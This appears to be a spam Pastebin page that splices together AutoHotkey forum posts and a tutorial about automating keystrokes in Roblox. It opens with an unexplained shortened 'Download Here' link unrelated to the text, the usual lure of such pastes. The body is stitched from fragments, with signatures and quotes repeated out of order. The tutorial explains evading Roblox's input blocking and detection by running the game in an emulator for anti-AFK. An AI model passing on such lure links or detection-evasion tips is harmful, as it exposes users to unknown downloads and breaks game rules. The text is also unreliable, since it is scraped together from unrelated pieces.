Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -
- Download Here --> https://tinyurl.com/ytwvd2es (Copy and Paste Link)
- Getting AHK working for ROBLOX
- If you don't have ROBLOX, i'm not pushing you to download it for the sake of a catchphrase, unless you want to.
- I'm trying to get this line working in-game. I've seen it done in-game and I've gotten it working before just yesterday, Although yesterday I accidentally undid what I have changed in this script that made it work. This is how it looked before my change (minus the note):
- If you already have roblox and mess with this and manage to get it to only put in the period from'/Catchphrases are cool.' into roblox, tell me.
- The script was copied from a spam bot example, but is not intended for spam, hence the '/Catchphrases are cool.' hints what I'm using this for.
- Members
- 845 posts
- Last active: Jan 24 2016 05:24 PM
- Joined: 08 Oct 2012
- IF NOT A_IsAdmin #SingleInstance, force SetWorkingDir, %A_ScriptDir% ^Q:: Catchphrase_function("NO broken harmony") Catchphrase_function("She had rainbow eyes") Catchphrase_function("OHhhhhHHhhhhHH") Catchphrase_function("MMMmmmmmm") return Catchphrase_function(tex) return F5:: reload return
- Download link of my scripts on Autohotkey.com 2/10/2015 [DOWNLAND]
- Contact Info: https://github.com/floowsnaake // FloowSnaake(A)gmail.com
- IF you need Help send me a PM,Email or Post on Github
- Quote by tank Posted 29 September 2015 - 06:14 PM
- "Eventually i will find a way to convert the DB back to PHPBB3. but i dont have the bandwidth right now. No one that has tried has had success. It is the Only way i can keep this open is if i could successfully convert it."
- That works everywhere else but not in-game
- Members
- 845 posts
- Last active: Jan 24 2016 05:24 PM
- Joined: 08 Oct 2012
- Then try different send styles:
- IF NOT A_IsAdmin #SingleInstance, force SetWorkingDir, %A_ScriptDir% ^Q:: Kex = test_ WaitTime = 500 ToolTip, Testing %Kex%1 With Send,0,0 Send, %Kex%1 sleep, %WaitTime% ToolTip, Testing %Kex%2 With SendRaw,0,0 sleep, %WaitTime% SendRaw, %Kex%2 ToolTip, Testing %Kex%3 With SendInput,0,0 sleep, %WaitTime% SendInput, %Kex%3 ToolTip, Testing %Kex%4 With SendPlay,0,0 sleep, %WaitTime% SendPlay, %Kex%4 ToolTip, Testing %Kex%5 With SendEvent,0,0 sleep, %WaitTime% SendEvent, %Kex%5
- Download link of my scripts on Autohotkey.com 2/10/2015 [DOWNLAND]
- Contact Info: https://github.com/floowsnaake // FloowSnaake(A)gmail.com
- IF you need Help send me a PM,Email or Post on Github
- Quote by tank Posted 29 September 2015 - 06:14 PM
- "Eventually i will find a way to convert the DB back to PHPBB3. but i dont have the bandwidth right now. No one that has tried has had success. It is the Only way i can keep this open is if i could successfully convert it."
- [Tutorial] How to use AutoHotkey in Roblox (How to Anti AFK in Roblox)
- I saw a lot of people in this sub being helpless about how to use AHK for Roblox.
- Roblox by itself blocks the ControlSend command so what I tried at first was to use Sandboxie which they blocked and kicked me out of the game (unexpected client behavior). What you need to do is download an Android emulator (I'm using LDPlayer). The code will work there because they can't detect it since it's another system.
- Here is the code for Anti AFK using LDPlayer (it just holds d for some time, you can change it to your liking). Sorry if the code is bad or something is unnecessary, I only started learning it few hours ago.
- #Persistent SetKeyDelay, 0 DetectHiddenWindows, On SetTitleMatchMode, 2
- Loop ControlSend, RenderWindow1, , LDPlayer sleep 100 ControlSend, RenderWindow1, , LDPlayer sleep 10000 > return
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement